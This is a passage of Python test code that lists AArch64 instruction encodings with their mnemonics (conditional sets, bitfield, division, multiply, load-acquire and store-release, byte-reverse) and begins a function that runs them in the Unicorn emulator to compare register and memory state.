("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x28\x00\x42\xfa", "ccmp x1, x2, 8, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x29\x00\x42\xfa", "ccmp x1, x2, 9, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2a\x00\x42\xfa", "ccmp x1, x2, 10, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2b\x00\x42\xfa", "ccmp x1, x2, 11, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2c\x00\x42\xfa", "ccmp x1, x2, 12, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2d\x00\x42\xfa", "ccmp x1, x2, 13, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2e\x00\x42\xfa", "ccmp x1, x2, 14, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2f\x00\x42\xfa", "ccmp x1, x2, 15, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x41\x14\x82\x9a", "cinc x1, x2, eq"),
("\x41\x04\x82\x9a", "cinc x1, x2, ne"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\xc1\xfd\xff\xd2", "movz x1, #0xffee, lsl #48"),
("\x81\xb9\xdb\xf2", "movk x1, #0xddcc, lsl #32"),
("\x41\x75\xb7\xf2", "movk x1, #0xbbaa, lsl #16"),
("\x01\x31\x93\xf2", "movk x1, #0x9988"),
("\x20\xfc\x40\xd3", "ubfiz x0, x1, #0, #64"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xf8\x7f\xd3", "ubfiz x0, x1, #1, #63"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xf4\x7e\xd3", "ubfiz x0, x1, #2, #62"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xf0\x7d\xd3", "ubfiz x0, x1, #3, #61"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xec\x7c\xd3", "ubfiz x0, x1, #4, #60"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xe8\x7b\xd3", "ubfiz x0, x1, #5, #59"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xe4\x7a\xd3", "ubfiz x0, x1, #6, #58"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xe0\x79\xd3", "ubfiz x0, x1, #7, #57"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xdc\x78\xd3", "ubfiz x0, x1, #8, #56"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x7c\x7a\xd3", "ubfiz x0, x1, #6, #32"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x00\x78\xd3", "ubfiz x0, x1, #8, #1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x00\x41\xd3", "ubfiz x0, x1, #63, #1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x00\x18\x53", "ubfiz w0, w1, #8, #1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x00\x01\x53", "ubfiz w0, w1, #31, #1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x7c\x00\x53", "ubfiz w0, w1, #0, #32"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x08\xc2\x9a", "udiv x0, x1, x2"),
("\x40\x08\xc1\x9a", "udiv x0, x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\x02\x00\x80\xd2", "movz x2, #0"),
("\x20\x08\xc2\x9a", "udiv x0, x1, x2"),
("\x40\x08\xc1\x9a", "udiv x0, x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x0c\xc2\x9a", "sdiv x0, x1, x2"),
("\x40\x0c\xc1\x9a", "sdiv x0, x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\x02\x00\x80\xd2", "movz x2, #0"),
("\x20\x0c\xc2\x9a", "sdiv x0, x1, x2"),
("\x40\x0c\xc1\x9a", "sdiv x0, x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x7c\xa2\x9b", "umull x0, w1, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\xc1\xfd\xff\xd2", "movz x1, #0xffee, lsl #48"),
("\x81\xb9\xdb\xf2", "movk x1, #0xddcc, lsl #32"),
("\x41\x75\xb7\xf2", "movk x1, #0xbbaa, lsl #16"),
("\x01\x31\x93\xf2", "movk x1, #0x9988"),
("\x20\x7c\xc1\x9b", "umulh x0, x1, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\xfc\xa2\x9b", "umnegl x0, w1, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x2c\xc2\x9a", "ror x0, x1, x2"),
("\x40\x2c\xc1\x9a", "ror x0, x2, x1"),
("\x40\x00\xc2\x93", "ror x0, x2, #0"),
("\x40\x04\xc2\x93", "ror x0, x2, #1"),
("\x40\x08\xc2\x93", "ror x0, x2, #2"),
("\x40\x0c\xc2\x93", "ror x0, x2, #3"),
("\x40\x10\xc2\x93", "ror x0, x2, #4"),
("\x40\xf8\xc2\x93", "ror x0, x2, #62"),
("\x40\xfc\xc2\x93", "ror x0, x2, #63"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\x80\xd2", "mov x1, #0"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x41\x00\x80\xd2", "mov x1, #1 << 1"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x81\x00\x80\xd2", "mov x1, #1 << 2"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\x82\xd2", "mov x1, #1 << 12"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\x82\xd2", "mov x1, #1 << 12"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\xb0\xd2", "mov x1, #1 << 31"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x21\x00\xc0\xd2", "mov x1, #1 << 32"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x41\x00\xc0\xd2", "mov x1, #1 << 33"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\xe8\xd2", "mov x1, #1 << 62"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\xf0\xd2", "mov x1, #1 << 63"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x21\x00\x80\xd2", "mov x1, #1 << 64"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\xdf\xc8", "ldar x5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\xdf\xc8", "ldar x9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\xdf\xc8", "ldar x11, [sp]"),
("\xff\xff\xdf\xc8", "ldar xzr, [sp]"),
("\xe7\xff\xdf\x88", "ldar w7, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\xdf\x08", "ldarb w5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\xdf\x08", "ldarb w9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\xdf\x08", "ldarb w11, [sp]"),
("\xff\xff\xdf\x08", "ldarb wzr, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\xdf\x48", "ldarh w5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\xdf\x48", "ldarh w9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\xdf\x48", "ldarh w11, [sp]"),
("\xff\xff\xdf\x48", "ldarh wzr, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\x5f\xc8", "ldaxr x5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\x5f\xc8", "ldaxr x9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\x5f\xc8", "ldaxr x11, [sp]"),
("\xff\xff\x5f\xc8", "ldaxr xzr, [sp]"),
("\xe7\xff\x5f\x88", "ldaxr w7, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\x5f\x08", "ldaxrb w5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\x5f\x08", "ldaxrb w9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\x5f\x08", "ldaxrb w11, [sp]"),
("\xff\xff\x5f\x08", "ldaxrb wzr, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\x5f\x48", "ldaxrh w5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\x5f\x48", "ldaxrh w9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\x5f\x48", "ldaxrh w11, [sp]"),
("\xff\xff\x5f\x48", "ldaxrh wzr, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x63\xa0\x84\xd2", "movz x3, #9475"),
("\x64\xa0\x84\xd2", "movz x4, #9475"),
("\xe5\x24\x81\xd2", "movz x5, #2343"),
("\xa6\xaf\x81\xd2", "movz x6, #3453"),
("\x87\x3a\x82\xd2", "movz x7, #4564"),
("\xe8\x16\x84\xd2", "movz x8, #8375"),
("\xe9\xc1\x84\xd2", "movz x9, #9743"),
("\xea\xaa\x82\xd2", "movz x10, #5463"),
("\x2b\xf8\x80\xd2", "movz x11, #1985"),
("\x25\xfc\x9f\xc8", "stlr x5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\x9f\xc8", "stlr x11, [sp]"),
("\x25\x00\x00\xf8", "stur x5, [x1]"),
("\x26\x00\x00\x38", "sturb w6, [x1]"),
("\x27\x00\x00\x78", "sturh w7, [x1]"),
("\x29\xfc\x9f\xc8", "stlr x9, [x1]"),
("\x2a\xfc\x9f\x08", "stlrb w10, [x1]"),
("\x2b\xfc\x9f\x48", "stlrh w11, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+12
("\x20\x7c\x5f\xc8", "ldxr x0, [x1]"),
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+24
("\x20\x7c\x5f\x08", "ldxrb w0, [x1]"),
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+36
("\x20\x7c\x5f\x48", "ldxrh w0, [x1]"),
("\xc1\xfd\xff\xd2", "movz x1, #0xffee, lsl #48"),
("\x81\xb9\xdb\xf2", "movk x1, #0xddcc, lsl #32"),
("\x41\x75\xb7\xf2", "movk x1, #0xbbaa, lsl #16"),
("\x01\x31\x93\xf2", "movk x1, #0x9988"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x0c\xc0\xda", "rev x0, x1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x08\xc0\x5a", "rev w0, w1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x04\xc0\xda", "rev16 x0, x1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x04\xc0\x5a", "rev16 w0, w1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x08\xc0\xda", "rev32 x0, x1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x00\xc0\xda", "rbit x0, x1"),
("\x20\x00\xc0\x5a", "rbit w0, w1"),
("\x20\x00\x80\xd2", "movz x0, #1"),
("\x20\x00\xc0\xda", "rbit x0, x1"),
("\x20\x00\xc0\x5a", "rbit w0, w1"),
]
def emu_with_unicorn(opcode, istate):
mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM)
mu.mem_map(ADDR, SIZE)
index = 0
for op, _ in CODE:
mu.mem_write(ADDR+index, op)
index += len(op)
mu.mem_write(STACK, bytes(istate['stack']))
mu.mem_write(HEAP, bytes(istate['heap']))
mu.reg_write(UC_ARM64_REG_X0, istate['x0'])
mu.reg_write(UC_ARM64_REG_X1, istate['x1'])
mu.reg_write(UC_ARM64_REG_X2, istate['x2'])
mu.reg_write(UC_ARM64_REG_X3, istate['x3'])
mu.reg_write(UC_ARM64_REG_X4, istate['x4'])
mu.reg_write(UC_ARM64_REG_X5, istate['x5'])
mu.reg_write(UC_ARM64_REG_X6, istate['x6'])
mu.reg_write(UC_ARM64_REG_X7, istate['x7'])
mu.reg_write(UC_ARM64_REG_X8, istate['x8'])
mu.reg_write(UC_ARM64_REG_X9, istate['x9'])
mu.reg_write(UC_ARM64_REG_X10, istate['x10'])
mu.reg_write(UC_ARM64_REG_X11, istate['x11'])
mu.reg_write(UC_ARM64_REG_X12, istate['x12'])
mu.reg_write(UC_ARM64_REG_X13, istate['x13'])
mu.reg_write(UC_ARM64_REG_X14, istate['x14'])
mu.reg_write(UC_ARM64_REG_X15, istate['x15'])
mu.reg_write(UC_ARM64_REG_X16, istate['x16'])
mu.reg_write(UC_ARM64_REG_X17, istate['x17'])
mu.reg_write(UC_ARM64_REG_X18, istate['x18'])
mu.reg_write(UC_ARM64_REG_X19, istate['x19'])
mu.reg_write(UC_ARM64_REG_X20, istate['x20'])
mu.reg_write(UC_ARM64_REG_X21, istate['x21'])
mu.reg_write(UC_ARM64_REG_X22, istate['x22'])
mu.reg_write(UC_ARM64_REG_X23, istate['x23'])
mu.reg_write(UC_ARM64_REG_X24, istate['x24'])
mu.reg_write(UC_ARM64_REG_X25, istate['x25'])
mu.reg_write(UC_ARM64_REG_X26, istate['x26'])
mu.reg_write(UC_ARM64_REG_X27, istate['x27'])
mu.reg_write(UC_ARM64_REG_X28, istate['x28'])
mu.reg_write(UC_ARM64_REG_X29, istate['x29'])
mu.reg_write(UC_ARM64_REG_X30, istate['x30'])
mu.reg_write(UC_ARM64_REG_PC, istate['pc'])
mu.reg_write(UC_ARM64_REG_SP, istate['sp'])
mu.reg_write(UC_ARM64_REG_NZCV, istate['n'] << 31 | istate['z'] << 30 | istate['c'] << 29 | istate['v'] << 28)
mu.emu_start(istate['pc'], istate['pc'] + len(opcode))
ostate = {
"stack": mu.mem_read(STACK, 0x100),
"heap": mu.mem_read(HEAP, 0x100),
"x0": mu.reg_read(UC_ARM64_REG_X0),
"x1": mu.reg_read(UC_ARM64_REG_X1),
"x2": mu.reg_read(UC_ARM64_REG_X2),
"x3": mu.reg_read(UC_ARM64_REG_X3),
"x4": mu.reg_read(UC_ARM64_REG_X4),
"x5": mu.reg_read(UC_ARM64_REG_X5),
"x6": mu.reg_read(UC_ARM64_REG_X6),
"x7": mu.reg_read(UC_ARM64_REG_X7),
"x8": mu.reg_read(UC_ARM64_REG_X8),
"x9": mu.reg_read(UC_ARM64_REG_X9),
"x10": mu.reg_read(UC_ARM64_REG_X10),
"x11": mu.reg_read(UC_ARM64_REG_X11),
"x12": mu.reg_read(UC_ARM64_REG_X12),
"x13": mu.reg_read(UC_ARM64_REG_X13),
"x14": mu.reg_read(UC_ARM64_REG_X14),
"x15": mu.reg_read(UC_ARM64_REG_X15),
